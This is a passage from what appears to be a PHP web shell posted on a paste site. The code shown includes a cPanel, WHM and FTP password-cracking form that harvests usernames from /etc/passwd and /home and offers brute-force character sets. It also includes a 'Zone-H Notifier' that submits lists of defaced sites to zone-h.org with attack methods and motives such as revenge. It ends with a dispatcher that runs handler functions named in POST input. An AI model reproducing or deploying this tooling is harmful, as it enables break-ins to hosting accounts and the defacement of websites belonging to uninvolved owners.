  2363. echo '<input type="button" name="cprm1" value="<" class="cpb"/><br /><br /><input type="button" name="cprmall" value="<<" class="cpb"/></td>';
  2364. echo '<td><textarea rows="20" name="users" cols="33"></textarea></td>';
  2365. echo '<td><textarea rows="20" name="passwords" cols="33"></textarea></td>';
  2366. echo '</tr>';
  2367. echo '<tr><td><input style="width:252px;" type="button" onclick="g(\'Cpanel\',null,\'grbetcpw\')" value="Grab usernames from /etc/passwd"/><br /><input style="margin-top:5px;width:252px;" type="button" onclick="g(\'Cpanel\',null,\'grbhome\')" value="Grab usernames from /home"/></td><td></td>';
  2368. echo '<td colspan="2"><span>Crack options:&nbsp;&nbsp;&nbsp;</span><input name="cracktype" value="cpanel" checked type="radio"><b>Cpanel(2082)</b>&nbsp;&nbsp;<input name="cracktype" value="whm" type="radio"><b>WHM(2087)</b>&nbsp;&nbsp;<input name="cracktype" value="ftp" type="radio"><b>Ftp(21)</b><br />
  2369. <div style="margin-top:5px;"><span>Timeout delay:&nbsp;&nbsp;</span><input type="text" name="connect_timeout" size="4" value=""/>&nbsp;&nbsp;
  2370. <input type="checkbox" name="bruteforce" value="true"/>&nbsp;<span>Bruteforce</span>&nbsp;
  2371. <select name="charset">
  2372. <option value="all">All Letters + Numbers</option>
  2373. <option value="numeric">Numbers</option>
  2374. <option value="letters">Letters</option>
  2375. <option value="symbols">Symbols</option>
  2376. <option value="lowercase">Lower Letters</option>
  2377. <option value="uppercase">Higher Letters</option>
  2378. <option value="lowernumeric">Lower Letters + Numbers</option>
  2379. <option value="uppernumeric">Upper Letters + Numbers</option>
  2380. <option value="lowersymbols">Lower Letters + Symbols</option>
  2381. <option value="uppersymbols">Upper Letters + Symbols</option>
  2382. <option value="letterssymbols">All Letters + Symbols</option>
  2383. <option value="numberssymbols">Numbers + Symbols</option>
  2384. <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
  2385. <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
  2386. <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
  2387. </select></div>
  2388. <div style="margin-top:5px;"><span>Min Bruteforce Length:&nbsp;&nbsp;</span><input type="text" name="min_length" size="5" value=""/>&nbsp;&nbsp;&nbsp;&nbsp;<span>Max Bruteforce Length:&nbsp;&nbsp;</span><input type="text" name="max_length" size="5" value=""/></div>
  2389. <div style="margin-top:5px;text-align:center"><input type="submit" value="Crack Now" name="submit" style="font-weight: bold;"/></div>
  2390. </td></tr>';
  2391. echo '</table>';
  2392. echo '</div>';
  2393. printFooter();
  2394. }
  2395. function actionZHposter(){
  2396. printHeader();
  2397. echo '<h1>Zone-H Notifier</h1><div class=content>';
  2398.  
  2399. echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
  2400. <input type="text" name="p1" size="40" value="AnOnGuY" /></br>
  2401. <select name="p2">
  2402. <option >--------SELECT--------</option>
  2403. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2404. <option value="2" >undisclosed (new) vulnerability</option>
  2405. <option value="3" >configuration / admin. mistake</option>
  2406. <option value="4" >brute force attack</option>
  2407. <option value="5" >social engineering</option>
  2408. <option value="6" >Web Server intrusion</option>
  2409. <option value="7" >Web Server external module intrusion</option>
  2410. <option value="8" >Mail Server intrusion</option>
  2411. <option value="9" >FTP Server intrusion</option>
  2412. <option value="10" >SSH Server intrusion</option>
  2413. <option value="11" >Telnet Server intrusion</option>
  2414. <option value="12" >RPC Server intrusion</option>
  2415. <option value="13" >Shares misconfiguration</option>
  2416. <option value="14" >Other Server intrusion</option>
  2417. <option value="15" >SQL Injection</option>
  2418. <option value="16" >URL Poisoning</option>
  2419. <option value="17" >File Inclusion</option>
  2420. <option value="18" >Other Web Application bug</option>
  2421. <option value="19" >Remote administrative panel access bruteforcing</option>
  2422. <option value="20" >Remote administrative panel access password guessing</option>
  2423. <option value="21" >Remote administrative panel access social engineering</option>
  2424. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2425. <option value="23" >Access credentials through Man In the Middle attack</option>
  2426. <option value="24" >Remote service password guessing</option>
  2427. <option value="25" >Remote service password bruteforce</option>
  2428. <option value="26" >Rerouting after attacking the Firewall</option>
  2429. <option value="27" >Rerouting after attacking the Router</option>
  2430. <option value="28" >DNS attack through social engineering</option>
  2431. <option value="29" >DNS attack through cache poisoning</option>
  2432. <option value="30" >Not available</option>
  2433. </select>
  2434. </br>
  2435. <select name="p3">
  2436. <option >--------SELECT--------</option>
  2437. <option value="1" >Heh...just for fun!</option>
  2438. <option value="2" >Revenge against that website</option>
  2439. <option value="3" >Political reasons</option>
  2440. <option value="4" >As a challenge</option>
  2441. <option value="5" >I just want to be the best defacer</option>
  2442. <option value="6" >Patriotism</option>
  2443. <option value="7" >Not available</option>
  2444. </select>
  2445. </br>
  2446. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
  2447. <input type="submit" value="Send Now !" />
  2448. </form>';
  2449. echo "</td></tr></table></form>";
  2450.  
  2451. if($_POST['a'] == 'ZHposter')
  2452. {
  2453. ob_start();
  2454. $sub = @get_loaded_extensions();
  2455. if(!in_array("curl", $sub))
  2456. {
  2457. die('[-] Curl Is Not Supported !! ');
  2458. }
  2459.  
  2460. $hacker9 = $_POST['p1'];
  2461. $method9 = $_POST['p2'];
  2462. $neden9 = $_POST['p3'];
  2463. $site9 = $_POST['p4'];
  2464.  
  2465. if (empty($hacker9))
  2466. {
  2467. die ("[#] You Must Fill In The Attacker Name !");
  2468. }
  2469. elseif($method9 == "--------SELECT--------")
  2470. {
  2471. die("[#] You Must Select The Method !");
  2472. }
  2473. elseif($neden9 == "--------SELECT--------")
  2474. {
  2475. die("[#] You Must Select The Reason");
  2476. }
  2477. elseif(empty($site9))
  2478. {
  2479. die("[#] You Must Enter the Sites List ! ");
  2480. }
  2481.  
  2482. $i = 0;
  2483. $sites = explode("\n", $site9);
  2484. while($i < count($sites))
  2485. {
  2486.  
  2487. if(substr($sites[$i], 0, 4) != "http")
  2488. {
  2489. $sites[$i] = "http://".$sites[$i];
  2490. }
  2491. ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
  2492. echo "Site : ".$sites[$i]." Defaced ! </br>";
  2493. ++$i;
  2494. }
  2495. echo "[#] Sites Sent To Zone-H :D !! ";
  2496.  
  2497. }
  2498. echo '</div>';
  2499. printFooter();
  2500. }
  2501. if( empty($_POST['a']) )
  2502. if(isset($default_action) && function_exists('action' . $default_action))
  2503. $_POST['a'] = $default_action;
  2504. else
  2505. $_POST['a'] = 'SecInfo';
  2506. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  2507. call_user_func('action' . $_POST['a'])
  2508. ?>
Add Comment
Please, Sign In to add comment